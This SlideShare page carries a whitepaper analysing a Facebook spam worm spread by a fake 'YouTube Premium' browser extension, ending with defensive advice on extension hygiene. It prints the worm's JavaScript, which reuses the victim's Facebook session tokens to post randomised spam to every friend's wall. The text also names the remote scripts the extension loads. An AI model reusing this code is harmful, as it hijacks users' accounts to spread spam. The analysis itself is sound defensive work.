SlideShare a Scribd company logo
Analysis of a Facebook
  spam exploited through
browser add-ons/extensions

  Prajwal Panchmahalkar
      panchmahalkar@gmail.com




                                Image courtesy : http://contactdubai.com
Though spam on Facebook is not new to us, however I find this particular spam leveraged
very smartly and it was a very interesting analysis to me because I was surprised to see what
extent the spammers can go. Today one of my friends on Facebook was so annoyed with this
spam which was posting on all his friends walls, which looked like this:




I was asked what to do, looking at it, it surely looked to be just like every other spam I
suggested him all the usual measures like remove all his Facebook applications that are
doubtful and clear his browser data. But it continued even after that so I decided to look into
it.

First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/,
looking at the blog it looked like this,




Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin
(wonder what a “premium” for YouTube would be!!).
So decided to look into the page source, here is what it contained:




So this would install the browser add-on/extension based on the browser, the else part of the
code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s
look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and
extracted it; the youtube.js was one to look into:




Ah, http://mieneeueueu.co.cc/yt/script.js a remote script
Navigating to it I found




Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;)

Now let’s analyze this script,

Remember the else part earlier in the first code snippet which I promised to discuss later? It
contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this
part to redirect the user to this URL after the installation of the add-on/extension, navigating
to that link I found




This page actually contained that video embedded; finally the person must be happy to see
this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)
As the person views the video and finishes it, this script stealing the browser cookies gets
enough time to spread the spam on all the friends’ walls



Further analyzing the code,




The code here assigns some random variables for the post so that it won’t be similar on all the
walls. So using all the variables post_form_id to var p3 make large combinations (use of
mathematical combinations, smart eh?).



Looking into the main part of the code where the message is generated and sent for post

for (var f = 0; f < b; f++) {

     if (a['payload']['entries'][f]['uid'] != user_id) {

        message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0,
a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');

        var g = new XMLHttpRequest();

        d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';

        title = '[VIDEO] Yeahh!! It happens on Live Television!';

        summary = 'Lol Checkout this video its very embracing moment for her';

        imagen = 'http://i.imgur.com/f9PE7.jpg';

       e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg +
'&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] +
'&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UI
ThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' +
randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) +
'&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title
+
'&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]
=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) +
'&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' +
Math['random']() +
'&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][im
ages][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-
1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][exp
ires]=41647446&attachment[params][images][0]=' + imagen +
'&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&
xhpc_message_text=' + message + '&xhpc_message=' + message +
'&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&pri
vacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';

      g['open']('POST', d, true);

      g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');

      g['setRequestHeader']('Content-length', e['length']);

      g['setRequestHeader']('Connection', 'keep-alive');

      g['onreadystatechange'] = function () {};

      g['send'](e);




Looking into the above snippet of code it is clear that it uses the grabbed cookies to post the
spam on others walls, this script also contained an unfinished part left out (may be the
spammer was happy with this for now or grab some time from the user to finish the spam
effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like,




However looking into the source it didn’t contain any script or rather it was a static page with
the content actually an image file.
Conclusion:

Though social networking sites often fall prey to such scams/spams it is much of users
consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is
genuine video from a valid link, in this case,




   1. Looking at the post the link from where the post originated is clearly youtube.com
      (underlined black)
   2. Further the thumbnail preview for videos has been changed the play button now is
      transparent black while the one in the spam we discussed had a blue play button
      (underlined red)
   3. Always install extensions from known sources
          a. Chrome – from chrome store
          b. Firefox – Mozilla add-ons
   4. Use add-ons like no-script, No-Ads to avoid such scripts.
   5. Stay away from scams/spams that promise to provide some gift or money.

More Related Content

Similar to An analysis of a facebook spam exploited through browser add-ons - Whitepaper

FVCP Ad Words
FVCP Ad WordsFVCP Ad Words
FVCP Ad Words
guest1575bb
 
Php2pdf
Php2pdfPhp2pdf
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video Presentation
Eric Michalsen
 
Free bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hourFree bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hour
caidedarrell
 
Share cash sucess! review 1, make money online from home
Share cash sucess! review 1,  make money online from homeShare cash sucess! review 1,  make money online from home
Share cash sucess! review 1, make money online from home
Duy Lên
 
Tech 20 Session 10
Tech 20 Session 10Tech 20 Session 10
Tech 20 Session 10
Greg Dhuyvetter
 
Technologies i have used
Technologies i have usedTechnologies i have used
Technologies i have used
GabyV45
 
5 Useful and Fun Website Links
5 Useful and Fun Website Links5 Useful and Fun Website Links
5 Useful and Fun Website Links
Charlie
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
Esteban Bedoya
 
My Story With Flickr
My Story With FlickrMy Story With Flickr
My Story With Flickr
Jose Martinez
 
Website Hacking Oldie
Website Hacking OldieWebsite Hacking Oldie
Website Hacking OldieAung Khant
 
Adding flash animation to a website
Adding flash animation to a websiteAdding flash animation to a website
Adding flash animation to a websiteBubblefruit.com
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
E Hacking
 
What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011
Iskandar Najmuddin
 
Pixlr and small apps in the classroom
Pixlr and small apps in the classroomPixlr and small apps in the classroom
Pixlr and small apps in the classroom
ArtfulArtsyAmy
 
Access youtube in china! china worldchat
Access youtube in china!   china worldchatAccess youtube in china!   china worldchat
Access youtube in china! china worldchat榴梿 坊林
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
n|u - The Open Security Community
 

Similar to An analysis of a facebook spam exploited through browser add-ons - Whitepaper (20)

FVCP Ad Words
FVCP Ad WordsFVCP Ad Words
FVCP Ad Words
 
Php2pdf
Php2pdfPhp2pdf
Php2pdf
 
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video Presentation
 
Free bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hourFree bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hour
 
Make+$50 $75
Make+$50 $75Make+$50 $75
Make+$50 $75
 
Share cash sucess! review 1, make money online from home
Share cash sucess! review 1,  make money online from homeShare cash sucess! review 1,  make money online from home
Share cash sucess! review 1, make money online from home
 
Tech 20 Session 10
Tech 20 Session 10Tech 20 Session 10
Tech 20 Session 10
 
Technologies i have used
Technologies i have usedTechnologies i have used
Technologies i have used
 
5 Useful and Fun Website Links
5 Useful and Fun Website Links5 Useful and Fun Website Links
5 Useful and Fun Website Links
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
Internet safety
Internet safetyInternet safety
Internet safety
 
My Story With Flickr
My Story With FlickrMy Story With Flickr
My Story With Flickr
 
Website Hacking Oldie
Website Hacking OldieWebsite Hacking Oldie
Website Hacking Oldie
 
Evaluation question 6
Evaluation question 6Evaluation question 6
Evaluation question 6
 
Adding flash animation to a website
Adding flash animation to a websiteAdding flash animation to a website
Adding flash animation to a website
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
 
What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011
 
Pixlr and small apps in the classroom
Pixlr and small apps in the classroomPixlr and small apps in the classroom
Pixlr and small apps in the classroom
 
Access youtube in china! china worldchat
Access youtube in china!   china worldchatAccess youtube in china!   china worldchat
Access youtube in china! china worldchat
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
 

More from n|u - The Open Security Community

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
n|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Api security-testing
Api security-testingApi security-testing
Api security-testing
n|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
n|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
n|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
n|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
n|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
n|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
n|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
n|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
n|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Android Pentesting
Android PentestingAndroid Pentesting

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

Executive Directors Chat Leveraging AI for Diversity, Equity, and Inclusion
Executive Directors Chat  Leveraging AI for Diversity, Equity, and InclusionExecutive Directors Chat  Leveraging AI for Diversity, Equity, and Inclusion
Executive Directors Chat Leveraging AI for Diversity, Equity, and Inclusion
TechSoup
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
Thiyagu K
 
The Diamonds of 2023-2024 in the IGRA collection
The Diamonds of 2023-2024 in the IGRA collectionThe Diamonds of 2023-2024 in the IGRA collection
The Diamonds of 2023-2024 in the IGRA collection
Israel Genealogy Research Association
 
Acetabularia Information For Class 9 .docx
Acetabularia Information For Class 9  .docxAcetabularia Information For Class 9  .docx
Acetabularia Information For Class 9 .docx
vaibhavrinwa19
 
Synthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptxSynthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptx
Pavel ( NSTU)
 
How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...
Jisc
 
The Diamond Necklace by Guy De Maupassant.pptx
The Diamond Necklace by Guy De Maupassant.pptxThe Diamond Necklace by Guy De Maupassant.pptx
The Diamond Necklace by Guy De Maupassant.pptx
DhatriParmar
 
South African Journal of Science: Writing with integrity workshop (2024)
South African Journal of Science: Writing with integrity workshop (2024)South African Journal of Science: Writing with integrity workshop (2024)
South African Journal of Science: Writing with integrity workshop (2024)
Academy of Science of South Africa
 
The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
heathfieldcps1
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Thiyagu K
 
Azure Interview Questions and Answers PDF By ScholarHat
Azure Interview Questions and Answers PDF By ScholarHatAzure Interview Questions and Answers PDF By ScholarHat
Azure Interview Questions and Answers PDF By ScholarHat
Scholarhat
 
Multithreading_in_C++ - std::thread, race condition
Multithreading_in_C++ - std::thread, race conditionMultithreading_in_C++ - std::thread, race condition
Multithreading_in_C++ - std::thread, race condition
Mohammed Sikander
 
Chapter 4 - Islamic Financial Institutions in Malaysia.pptx
Chapter 4 - Islamic Financial Institutions in Malaysia.pptxChapter 4 - Islamic Financial Institutions in Malaysia.pptx
Chapter 4 - Islamic Financial Institutions in Malaysia.pptx
Mohd Adib Abd Muin, Senior Lecturer at Universiti Utara Malaysia
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
Mohd Adib Abd Muin, Senior Lecturer at Universiti Utara Malaysia
 
Introduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp NetworkIntroduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp Network
TechSoup
 
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdfMASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
goswamiyash170123
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
Jisc
 
Biological Screening of Herbal Drugs in detailed.
Biological Screening of Herbal Drugs in detailed.Biological Screening of Herbal Drugs in detailed.
Biological Screening of Herbal Drugs in detailed.
Ashokrao Mane college of Pharmacy Peth-Vadgaon
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
EverAndrsGuerraGuerr
 
Natural birth techniques - Mrs.Akanksha Trivedi Rama University
Natural birth techniques - Mrs.Akanksha Trivedi Rama UniversityNatural birth techniques - Mrs.Akanksha Trivedi Rama University
Natural birth techniques - Mrs.Akanksha Trivedi Rama University
Akanksha trivedi rama nursing college kanpur.
 

Recently uploaded (20)

Executive Directors Chat Leveraging AI for Diversity, Equity, and Inclusion
Executive Directors Chat  Leveraging AI for Diversity, Equity, and InclusionExecutive Directors Chat  Leveraging AI for Diversity, Equity, and Inclusion
Executive Directors Chat Leveraging AI for Diversity, Equity, and Inclusion
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
 
The Diamonds of 2023-2024 in the IGRA collection
The Diamonds of 2023-2024 in the IGRA collectionThe Diamonds of 2023-2024 in the IGRA collection
The Diamonds of 2023-2024 in the IGRA collection
 
Acetabularia Information For Class 9 .docx
Acetabularia Information For Class 9  .docxAcetabularia Information For Class 9  .docx
Acetabularia Information For Class 9 .docx
 
Synthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptxSynthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptx
 
How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...How libraries can support authors with open access requirements for UKRI fund...
How libraries can support authors with open access requirements for UKRI fund...
 
The Diamond Necklace by Guy De Maupassant.pptx
The Diamond Necklace by Guy De Maupassant.pptxThe Diamond Necklace by Guy De Maupassant.pptx
The Diamond Necklace by Guy De Maupassant.pptx
 
South African Journal of Science: Writing with integrity workshop (2024)
South African Journal of Science: Writing with integrity workshop (2024)South African Journal of Science: Writing with integrity workshop (2024)
South African Journal of Science: Writing with integrity workshop (2024)
 
The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
 
Azure Interview Questions and Answers PDF By ScholarHat
Azure Interview Questions and Answers PDF By ScholarHatAzure Interview Questions and Answers PDF By ScholarHat
Azure Interview Questions and Answers PDF By ScholarHat
 
Multithreading_in_C++ - std::thread, race condition
Multithreading_in_C++ - std::thread, race conditionMultithreading_in_C++ - std::thread, race condition
Multithreading_in_C++ - std::thread, race condition
 
Chapter 4 - Islamic Financial Institutions in Malaysia.pptx
Chapter 4 - Islamic Financial Institutions in Malaysia.pptxChapter 4 - Islamic Financial Institutions in Malaysia.pptx
Chapter 4 - Islamic Financial Institutions in Malaysia.pptx
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
 
Introduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp NetworkIntroduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp Network
 
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdfMASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
MASS MEDIA STUDIES-835-CLASS XI Resource Material.pdf
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
 
Biological Screening of Herbal Drugs in detailed.
Biological Screening of Herbal Drugs in detailed.Biological Screening of Herbal Drugs in detailed.
Biological Screening of Herbal Drugs in detailed.
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
 
Natural birth techniques - Mrs.Akanksha Trivedi Rama University
Natural birth techniques - Mrs.Akanksha Trivedi Rama UniversityNatural birth techniques - Mrs.Akanksha Trivedi Rama University
Natural birth techniques - Mrs.Akanksha Trivedi Rama University
 

An analysis of a facebook spam exploited through browser add-ons - Whitepaper

  • 1. Analysis of a Facebook spam exploited through browser add-ons/extensions Prajwal Panchmahalkar panchmahalkar@gmail.com Image courtesy : http://contactdubai.com
  • 2. Though spam on Facebook is not new to us, however I find this particular spam leveraged very smartly and it was a very interesting analysis to me because I was surprised to see what extent the spammers can go. Today one of my friends on Facebook was so annoyed with this spam which was posting on all his friends walls, which looked like this: I was asked what to do, looking at it, it surely looked to be just like every other spam I suggested him all the usual measures like remove all his Facebook applications that are doubtful and clear his browser data. But it continued even after that so I decided to look into it. First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/, looking at the blog it looked like this, Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).
  • 3. So decided to look into the page source, here is what it contained: So this would install the browser add-on/extension based on the browser, the else part of the code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look into: Ah, http://mieneeueueu.co.cc/yt/script.js a remote script
  • 4. Navigating to it I found Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;) Now let’s analyze this script, Remember the else part earlier in the first code snippet which I promised to discuss later? It contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this part to redirect the user to this URL after the installation of the add-on/extension, navigating to that link I found This page actually contained that video embedded; finally the person must be happy to see this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)
  • 5. As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls Further analyzing the code, The code here assigns some random variables for the post so that it won’t be similar on all the walls. So using all the variables post_form_id to var p3 make large combinations (use of mathematical combinations, smart eh?). Looking into the main part of the code where the message is generated and sent for post for (var f = 0; f < b; f++) { if (a['payload']['entries'][f]['uid'] != user_id) { message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' '); var g = new XMLHttpRequest(); d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; title = '[VIDEO] Yeahh!! It happens on Live Television!'; summary = 'Lol Checkout this video its very embracing moment for her'; imagen = 'http://i.imgur.com/f9PE7.jpg'; e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UI ThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary] =' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' +
  • 6. Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][im ages][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=- 1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][exp ires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100& xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&pri vacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest'; g['open']('POST', d, true); g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); g['setRequestHeader']('Content-length', e['length']); g['setRequestHeader']('Connection', 'keep-alive'); g['onreadystatechange'] = function () {}; g['send'](e); Looking into the above snippet of code it is clear that it uses the grabbed cookies to post the spam on others walls, this script also contained an unfinished part left out (may be the spammer was happy with this for now or grab some time from the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like, However looking into the source it didn’t contain any script or rather it was a static page with the content actually an image file.
  • 7. Conclusion: Though social networking sites often fall prey to such scams/spams it is much of users consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is genuine video from a valid link, in this case, 1. Looking at the post the link from where the post originated is clearly youtube.com (underlined black) 2. Further the thumbnail preview for videos has been changed the play button now is transparent black while the one in the spam we discussed had a blue play button (underlined red) 3. Always install extensions from known sources a. Chrome – from chrome store b. Firefox – Mozilla add-ons 4. Use add-ons like no-script, No-Ads to avoid such scripts. 5. Stay away from scams/spams that promise to provide some gift or money.